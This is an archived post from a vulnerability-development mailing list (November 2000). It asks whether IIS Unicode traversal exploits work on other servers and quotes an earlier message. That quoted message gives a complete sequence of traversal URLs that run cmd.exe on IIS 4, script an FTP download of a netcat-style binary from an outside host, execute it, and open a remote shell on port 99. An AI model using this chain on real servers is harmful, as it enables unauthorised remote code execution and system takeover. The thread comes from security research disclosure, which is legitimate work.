Vulnerability Development mailing list archives
Re: dos commands via iis 4
From: "Bluefish (P.Magnusson)" <11a () GMX NET>
Date: Thu, 23 Nov 2000 00:36:29 +0100
Has anyone researched if similar unicode exploits can be used against other platforms than IIS? Other webserver for windows, etc? ..:::::::::::::::::::::::::::::::::::::::::::::::::.. http://www.11a.nu || http://bluefish.11a.nu eleventh alliance development & security team http://www.eff.org/cafe On Thu, 9 Nov 2000, RayW, CISSP wrote:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hello All, or you could really have fun with a command line dos shell :) http://www.site.com/scripts/..%c0%af/winnt/system32/cmd.exe?/c+copy+.. \..\winnt\system32\ftp.exe+ftp2.exe http://www.site.com/scripts/..%c0%af../inetpub/scripts/cmd1.exe?/c+ech o+open%20ftp.site.com+>file http://www.site.com/scripts/..%c0%af../inetpub/scripts/cmd1.exe?/c+ech o+username+>>file http://www.site.com/scripts/..%c0%af../inetpub/scripts/cmd1.exe?/c+ech o+userpassword+>>file http://www.site.com/scripts/..%c0%af../inetpub/scripts/cmd1.exe?/c+ech o+get%20ncx99.exe+>>file http://www.site.com/scripts/..%c0%af../inetpub/scripts/cmd1.exe?/c+ech o+quit+>>file http://www.site.com/scripts/..%c0%af../inetpub/scripts/ftp2.exe?-s:fil e http://www.site.com/scripts/..%c0%af../inetpub/scripts/ncx99.exe? then telnet to www.site.com port 99 and you have a shell on the local machine, granted limited access but that is just another step.....I will leave up to you all. Regards, RayW, CISSP -----BEGIN PGP SIGNATURE----- Version: PGP Personal Privacy 6.5.3 iQA/AwUBOgt4dk2IvpwrSWYUEQLowACg6MOsp3K05dbYtu9T77v17pn+J0cAnjX8 2tqpbnZro1bZod5FGDzC4ZNm =Kp/t -----END PGP SIGNATURE-----
Current thread:
- dos commands via iis 4 booboo (Nov 10)
- Re: dos commands via iis 4 [ K o S a K ] (Nov 10)
- Re: dos commands via iis 4 RayW, CISSP (Nov 11)
- Re: dos commands via iis 4 Nikolaou, Dinos (Nov 11)
- Re: dos commands via iis 4 Bluefish (P.Magnusson) (Nov 23)
- Re: dos commands via iis 4 RayW, CISSP (Nov 11)
- Re: dos commands via iis 4 Robert A. Seace (Nov 11)
- Re: dos commands via iis 4 booboo (Nov 15)
- <Possible follow-ups>
- Re: dos commands via iis 4 Unicraft Systems (Nov 11)
- Re: dos commands via iis 4 [ K o S a K ] (Nov 10)